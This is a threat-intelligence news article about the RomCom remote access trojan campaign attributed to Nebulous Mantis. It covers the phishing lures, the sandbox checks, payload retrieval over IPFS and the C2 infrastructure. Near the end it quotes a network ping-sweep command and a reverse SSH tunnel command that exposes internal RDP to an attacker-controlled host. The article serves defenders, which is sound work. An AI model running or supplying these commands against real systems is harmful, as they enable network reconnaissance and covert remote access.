Cybersecurity experts have uncovered a sophisticated espionage campaign orchestrated by the threat actor group known as Nebulous Mantis, utilizing an advanced remote access trojan called RomCom to target organizations globally.

The campaign employs deceptive spear-phishing tactics coupled with multi-stage malware deployment to establish persistent access to victim networks, exfiltrate sensitive data, and potentially enable lateral movement within compromised infrastructures.

Initial infection vectors predominantly involve spear-phishing emails containing OneDrive-themed download links that purport to offer legitimate documents such as “Situation details & Evidence_April_25.pdf.”

When unsuspecting victims click these links, they unknowingly download the initial executable of the RomCom downloader variant from Mediafire, representing a tactical shift from the group’s previous use of temp.sh for file hosting services.

Catalyst researchers identified that upon execution, the malware employs sophisticated anti-analysis mechanisms to evade detection, including filename hash verification and registry checks to determine if it’s running in a sandbox environment.

The malware specifically examines the “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs” registry key to verify if the value exceeds 55, which would be consistent with normal user activity rather than an analysis environment.

The RomCom RAT operates through a multi-stage infection process, beginning with a downloader component that injects the first-stage DLL variant into the legitimate explorer.exe process.

This DLL, written in C, establishes connection with command and control (C2) infrastructure to download additional attack toolkits and execute commands on the compromised system.

What distinguishes this campaign is the threat actor’s innovative use of the InterPlanetary File System (IPFS) – a decentralized peer-to-peer network designed for file storage and sharing.

Instead of relying exclusively on traditional centralized C2 servers, RomCom leverages domains such as ipfs.io, hardbin.com, and dweb.link to retrieve additional payloads, making detection and takedown efforts significantly more challenging.

Sophisticated Infection Chain and Command Execution

The infection chain involves multiple stages, with the malware utilizing specific IPNS CID addresses to connect to IPFS domains.

Once established on the victim’s system, the final stage of RomCom connects to its C2 server at opendnsapi.net to receive commands and download supplementary modules.

These modules are typically stored in the “c:\users\public” directory with filenames such as mfc86.exe, shbhost.exe, and cconsrv.exe.

A distinctive feature of RomCom’s operation is its extensive reconnaissance capabilities. The malware executes a comprehensive set of commands to gather system information, including time zone data through “tzutil /g” and user details via “whoami /all” and “net localgroup administrators”.

For network discovery, it employs commands like:-

for /L %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find "TTL=" >> C:\Users\Public\1.txt

This command systematically scans the local network for active hosts, storing results for exfiltration. The malware also establishes persistence and creates remote access tunnels through sophisticated techniques such as reverse SSH tunneling:-

C:\users\public\music\sample.exe -hostkey SHA256:{HOSTKEY} -batch -pw "{PASSWORD}" -N -R 25671:{INFECTED_NETWORK_IP}:3389 root@{ATTACKERS_REMOTE_IP} -P 56777

This command creates a reverse tunnel mapping the attacker’s port to the internal RDP service, enabling external access to internal resources while evading traditional network security controls.

Are you from the SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.